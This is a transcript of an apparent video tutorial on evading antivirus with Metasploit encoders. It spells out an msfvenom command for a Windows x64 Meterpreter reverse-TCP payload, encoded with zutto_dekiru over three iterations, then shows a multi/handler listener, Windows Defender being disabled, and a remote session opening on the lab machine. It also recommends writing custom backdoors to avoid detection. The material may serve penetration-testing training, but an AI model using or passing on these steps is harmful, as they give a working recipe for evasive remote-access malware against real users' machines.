Hello everybody and welcome back to this tutorial, and in this video we're going to continue our bypassing of the antivirus. We're going to take a look at the certain encoders in the Metasploit framework. Now, what encoders allow us to do is to encode our payloads in order for them to actually be able to bypass some of the antiviruses. Now, of course, this will not work for every antivirus out there. Most of them will actually catch it still, because these encoders are really known. Since they are in the actual Metasploit framework, they have been used a lot of times, and therefore most of the antiviruses still know them. You can bypass some of them using this method. Let's take a look at that. Now, keep in mind that the tools that are used to actually bypass the antivirus are updated every single month, because as soon as they come out, the antivirus vendors get a look at them and then they update their antivirus. Therefore, the payload that may be actually worked on bypassing a certain antivirus 1 week ago will not work right now. Therefore, this is basically a game of cat and mouse, and it only depends how you actually encode your payload, how you actually make it look different than the one that is in the database of the antivirus vendors. And therefore, if it is slightly different than the actual one in the database, it will be able to bypass the antivirus, and therefore it will not get recognized as a Trojan. Now, the best way to actually bypass an antivirus, as I said before, is to code your own tool. So code your own backdoor, code your own reverse shell. Therefore, you will be able to bypass antivirus most of the time, because that is a type of code that hasn't been seen before by the antivirus vendors. Right now, let me open up my root terminal, and right here I will zoom this in slightly. And we're going to use the MSF Venom tool in order to actually create a payload that is going to have specific options added to it. Now, what we did before is we created a payload for the x64 machine using the interpreter shell. We defined the L host, the L port. We also said that the file should be exe. We also gave it the output name. But right now we're going to add two more different options. One of them is the actual encoder that we're going to use, and the second one is the actual iteration of that encoder. So how many times do we want to encode the actual payload? Now, there is another option that we can add, which is bad bytes. So let me just type right here. If I open up MSF Venom help menu, you can see right here bad chars is also something that we can add. It will simply just avoid characters, for example these ones, if we specify them in between the single quotes in our actual command. And right here, -e is another option that we are looking for. So here it is, -e encoder, the encoder to use. So we can see the list of encoders by typing --list. So since the target that we're going to attack is going to be our Windows 10 machine, or in this case my Windows 10 machine, you can attack Windows 7 or whatever actual Windows you have. I'm going to use a 64-bit encoder because the actual machine that I'm attacking is 64-bit. In order to actually type the command, let us start off by specifying MSF Venom, the name of the tool. We want to specify -a, which is the architecture, so we are attacking x64. Then -- the platform. We can specify to be Windows because we are attacking a Windows target. The -p stands for payload, as we already know, so we will specify the payload for the 64-bit interpreter. We can type that Windows /x64/interpreter /reverse TCP. Okay, and then after it we specify the two most important options, which is the L host and L port. But before we do that, I need to check out my IP address on my Kali Linux machine. So I will open the second terminal, type ifconfig right here. My IP address is 192.168.1.7. So I will specify it right here, L host equals 192.168.1.7. And the L port is going to be 4444. As usual, the default local port. We are not going to change it, we're going to leave it on that. And now the next thing that we need to specify is -e, which stands for the encoder. And we're going to use an encoder which is called x64, and then actual /zuto with _t _ dekiru. So this is the name of the encoder that belongs to Metasploit framework. Now, there are also some different encoders, such as Shikata Ganai, and bunch of different encoders right here. If we open up the MSF console right here in the second terminal, We can simply, as it loads up the actual banner and the opening menu, we can see how many encoders are there in the actual Metasploit Framework console. But this is just the most basic way of bypassing the antiviruses. This will not work all the time, and this will not work on all the antiviruses. This is the most basic way to bypass the antivirus. In the next tutorial, I will show you a little bit more advanced way to bypass some of the antiviruses. Now keep in mind that these two methods that I'm going to show you in this video and in the next video will not bypass all of the antiviruses. In order to bypass all of the antiviruses, you need to actually use some new made tools that are used to bypass any antivirus in some different way, by different encoding or changing up the code or anything like that. The tool has to be new because then it is not known to the actual antivirus vendors. Or another way is to code your own tools. Therefore, you will have a unique code and it will not be stored in the antivirus database, and therefore it will not be known to them. We specify the actual encoder, the number of iterations we can specify with -i, and we can specify, for example, 3 iterations. Now, another thing that we saw in the help menu is -b, which stands for basically bad characters or bad bytes, and we can simply just specify single quote and then backslash and then x00. For example, we can specify that one, and this will not really do any difference to this payload, so we can just use it in order to see how the option works. Now, another thing we need to specify is -f and then exe, because we want to create the exe file as we are going to run it on Windows, and -o, we can call it test.exe. Press here enter, and in no time, in just a few seconds, this should create a payload for us that we can execute on the target machine. It should be encoded using this encoder right here, iterations number 3. No bad characters, so it should not have any bytes, any 0 bytes should I say. It should be for the x64 platform for Windows, and it should connect to this IP address right here on this local port. The name of the file will be test.exe, and the file type will be exe, as it says right here. We can see right here that there are 44 encoders in Metasploit Framework, so you can feel free to actually list all of them and check out some different ones. Basically, the usage will be the same. You simply just type -e and then the name of the encoder and then the number of iterations. Even though this is not really required, you can simply just specify this if you want multiple iterations. If you don't specify this, it will just iterate only once. We'll just go right here, use exploit multi-handler, set payload, Windows x64 interpreter, reverse TCP. Okay, so we set the actual payload. Now show options right here. Open this up. Set the lhost to be equal to 192.168.1.7. Okay, so everything is set right here, and the payload has finished creating. So right now what we're going to do is we are going to actually import my USB drive. Let me see whether my actual Windows Defender is turned off. Manage settings for the viruses. This should be turned off, just so it doesn't present us a problem. Now, if you have your Windows Defender turned on, you can simply check out whether it will catch it or not. But for now on, as we only want to run this file and see if it works, we don't really want to bother with that at the moment. So let us just transfer the actual test.exe, media, root, and then the USB drive. Okay, so once again, you can transfer the actual file using the Apache 2 web server if you'd like. Just in my case, I think this is a faster method, so I will unplug my USB drive right here. I will run the actual exploit and wait for a connection. As we can see, started reverse TCP handler on this IP address, and all we need to do is run the actual virus and see if it will work. Now, the only thing we changed from before is we actually used an encoder, so it shouldn't really present us any problem. We will see just in a few seconds whether this will work. So find test.exe, here it is. Put it right here. And now let us double click on it, run it, and we can see we got Meterpreter session 1 opened from the IP address of my Windows 10 machine. Okay, and if we just use the help menu, we can see there are all of the available options that we had previously. In the next video, I'm going to show you a tool called hex editor, which can be used to actually change the bytes in the actual data itself. So we can create a payload, and then we can use the hex editor in order to change some bytes in the actual executable data. The bytes that we are going to change are mostly going to be just strings, because they don't really make any difference if we change the name of a string. Simply, if there is a line in the code that says print hello world, it will not present any problem to a program if we simply just type print world hello, so we reverse those two lines. And that is something that we're going to change in the executable, so we're going to find some strings that don't matter to the actual program, and then we're going to change them just so we can change the order of the bytes, and we can change different bytes in order to maybe possibly bypass some of the actual antiviruses out there. That will be about it for this tutorial. I hope you enjoyed it, and I hope I will see you in the next one. Bye.